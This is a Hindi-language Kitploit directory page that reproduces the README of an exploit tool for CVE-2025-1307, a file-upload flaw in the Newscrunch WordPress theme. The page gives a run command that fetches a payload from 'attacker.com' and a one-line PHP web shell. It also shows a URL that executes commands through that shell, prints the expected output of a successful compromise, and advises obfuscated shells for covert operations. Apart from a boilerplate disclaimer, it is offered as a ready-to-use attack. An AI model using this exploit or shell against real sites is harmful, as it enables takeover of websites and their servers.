Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nxploited/cve-2025-1307
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - प्रमाणित (Subscriber+) मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Newscrunch एक्सप्लॉइट (CVE-2025-1307)

🚨 अवलोकन

यह एक्सप्लॉइट Newscrunch WordPress थीम में एक गंभीर भेद्यता (CVE-2025-1307) को लक्षित करता है। यह दोष newscrunch_install_and_activate_plugin() फ़ंक्शन में क्षमता जांच की कमी के कारण प्रमाणित उपयोगकर्ताओं (सब्सक्राइबर और उससे ऊपर) को मनमानी फ़ाइलें अपलोड करने की अनुमति देता है। इससे रिमोट कोड निष्पादन (RCE) हो सकता है, जो प्रभावित WordPress साइट को पूरी तरह से समझौता कर देता है।


🔥 भेद्यता विवरण

  • CVE ID: CVE-2025-1307
  • प्रभावित सॉफ्टवेयर: Newscrunch WordPress Theme (<= 1.8.4.1)
  • CWE वर्गीकरण: CWE-862 - अनधिकृत पहुँच
  • CVSS स्कोर: 9.8 (गंभीर)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • प्रकाशन तिथि: 4 मार्च, 2025

🛑 गंभीरता और प्रभाव

  • ✅ रिमोट कोड निष्पादन (RCE)
  • ✅ पूर्ण सिस्टम समझौता
  • ✅ अनधिकृत फ़ाइल अपलोड
  • ✅ विशेषाधिकार वृद्धि जोखिम

शोषण क्षमता: इसके लिए सब्सक्राइबर विशेषाधिकार या उससे ऊपर वाले वैध WordPress खाते की आवश्यकता है।


📜 स्क्रिप्ट की विशेषताएँ

✅ CVE-2025-1307 का स्वचालित शोषण
✅ असुरक्षित थीम संस्करण का स्वतः पता लगाना
✅ ZIP पेलोड का स्वचालित निष्कर्षण और निष्पादन
✅ ZIP से गतिशील रूप से शेल फ़ाइल नाम प्राप्त करता है
✅ शोषण के बाद शेल उपलब्धता की स्वतः जाँच करता है
✅ डीबगिंग के लिए साफ और संरचित लॉगिंग


🚀 उपयोग कैसे करें

📌 पूर्वापेक्षाएँ

सुनिश्चित करें कि आपके पास Python 3.x स्थापित है और आवश्यक निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install requests urllib3 packaging

🔧 एक्सप्लॉइट चलाना

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 उपयोग

root@kitploit:~
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload

🛠️ अपलोड किए गए शेल का उपयोग करना

एक बार शेल सफलतापूर्वक अपलोड हो जाने पर, यह लक्ष्य प्रणाली पर रिमोट कमांड निष्पादन की अनुमति देता है। शेल फ़ाइल को ZIP आर्काइव के अंदर रखा जाना चाहिए, और यह शोषण पर स्वचालित रूप से निकाला जाएगा।

🔹 ZIP पेलोड बनाना

सुनिश्चित करें कि आपका PHP शेल (shell.php) ZIP आर्काइव के अंदर है। फिर, एक्सप्लॉइट का उपयोग करके ZIP फ़ाइल अपलोड करें।

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 कमांड निष्पादित करना

आप शेल URL में cmd पैरामीटर जोड़कर ब्राउज़र के माध्यम से सिस्टम कमांड निष्पादित कर सकते हैं:

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ शेल को सुरक्षित करना

  • चूंकि यह एक साधारण वेब शेल है, इसमें प्रमाणीकरण का अभाव है और इसका सावधानी से उपयोग किया जाना चाहिए।
  • यदि पता चल जाता है, तो इसे प्रशासकों द्वारा आसानी से हटाया जा सकता है।
  • गुप्त संचालन के लिए अस्पष्ट PHP कोड या पासवर्ड-संरक्षित शेल का उपयोग करने पर विचार करें।

🔹 अपेक्षित आउटपुट

root@kitploit:~
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। भेद्यताओं का अनधिकृत शोषण अवैध है और कानून द्वारा दंडनीय है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। जिम्मेदारी से उपयोग करें।

द्वारा: Nxploit | Khaled Alenazi

टूल डाउनलोड करें